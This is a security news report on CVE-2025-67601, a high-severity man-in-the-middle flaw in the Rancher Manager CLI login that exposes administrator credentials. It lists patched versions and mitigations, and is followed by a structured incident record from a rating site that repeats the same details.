High-Severity Flaw in Rancher Manager Exposes Admin Credentials via MITM Attacks
A newly disclosed vulnerability in Rancher Manager, tracked as CVE-2025-67601 (advisory GHSA-mc24-7m59-4q5p), could allow attackers to intercept administrator login credentials during Rancher CLI operations. The flaw, rated High severity, was published last week by security researcher samjustus.
The issue affects Rancher Manager packages in the Go ecosystem, specifically within the github.com/rancher/rancher repository. It occurs when users log into the Rancher CLI using the command rancher login with the --skip-verify flag but without the --cacert flag. Under these conditions, the CLI fetches CA certificates from Rancher Manager’s internal settings (cacerts), bypassing TLS validation. This creates a Man-in-the-Middle (MITM) attack vector, where a remote attacker positioned between the CLI and Rancher Manager could intercept basic authentication headers and session tokens during login.
The vulnerability stems from improper TLS certificate validation, as the --skip-verify flag disables server certificate checks while the CLI automatically retrieves trusted CA certificates from Rancher Manager. An attacker could exploit this by injecting a malicious CA certificate, impersonating a trusted service and compromising the confidentiality and integrity of Rancher clusters. This aligns with MITRE ATT&CK technique T1557 (Man-in-the-Middle), enabling credential theft or unauthorized cluster configuration changes.
Affected Versions & Mitigation
The Rancher team has released patched versions to address the flaw by removing automatic CA certificate fetching during login:
- v2.13.2
- v2.12.6
- v2.11.10
- v2.10.11
Until upgrades are applied, administrators should always include the --cacert flag with a valid CA certificate when using rancher login, particularly in environments with self-signed CAs. Security teams are advised to assess whether Rancher CLI connections traverse untrusted networks and prioritize updates to the latest stable release.
Source: https://cyberpress.org/rancher-manager-security-bug/
Rancher cybersecurity rating report: https://www.rankiteo.com/company/rancher
"id": "RAN1770216204",
"linkid": "rancher",
"type": "Vulnerability",
"date": "1/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"{'affected_entities': [{'industry': 'Cloud Computing/Container Management',
'name': 'Rancher (SUSE)',
'type': 'Software Vendor'}],
'attack_vector': 'Man-in-the-Middle (MITM)',
'data_breach': {'sensitivity_of_data': 'High',
'type_of_data_compromised': 'Authentication credentials '
'(basic auth headers, session '
'tokens)'},
'description': 'A newly disclosed vulnerability in Rancher Manager, tracked '
'as CVE-2025-67601 (advisory GHSA-mc24-7m59-4q5p), could allow '
'attackers to intercept administrator login credentials during '
'Rancher CLI operations. The flaw occurs when users log into '
'the Rancher CLI using the command `rancher login` with the '
'`--skip-verify` flag but without the `--cacert` flag, '
'enabling a Man-in-the-Middle (MITM) attack vector where a '
'remote attacker could intercept basic authentication headers '
'and session tokens.',
'impact': {'data_compromised': 'Administrator login credentials (basic '
'authentication headers and session tokens)',
'identity_theft_risk': 'High (if credentials are intercepted)',
'operational_impact': 'Unauthorized cluster configuration changes, '
'potential compromise of Rancher clusters',
'systems_affected': 'Rancher Manager clusters'},
'lessons_learned': 'Importance of proper TLS certificate validation and '
'avoiding the use of `--skip-verify` without `--cacert` in '
'Rancher CLI operations',
'post_incident_analysis': {'corrective_actions': 'Removal of automatic CA '
'certificate fetching during '
'login in patched versions',
'root_causes': 'Improper TLS certificate '
'validation in Rancher CLI when '
'using `--skip-verify` without '
'`--cacert`'},
'recommendations': ['Upgrade to the latest patched versions of Rancher '
'Manager (v2.13.2, v2.12.6, v2.11.10, v2.10.11)',
'Always use the `--cacert` flag with a valid CA '
'certificate when logging into Rancher CLI',
'Assess Rancher CLI connections for traversal of '
'untrusted networks'],
'references': [{'source': 'GitHub Advisory',
'url': 'https://github.com/advisories/GHSA-mc24-7m59-4q5p'}],
'response': {'containment_measures': 'Use of `--cacert` flag with a valid CA '
'certificate when using `rancher login`',
'enhanced_monitoring': 'Assess Rancher CLI connections '
'traversing untrusted networks',
'remediation_measures': 'Upgrade to patched versions (v2.13.2, '
'v2.12.6, v2.11.10, v2.10.11)'},
'title': 'High-Severity Flaw in Rancher Manager Exposes Admin Credentials via '
'MITM Attacks',
'type': 'Vulnerability Exploitation',
'vulnerability_exploited': 'CVE-2025-67601'}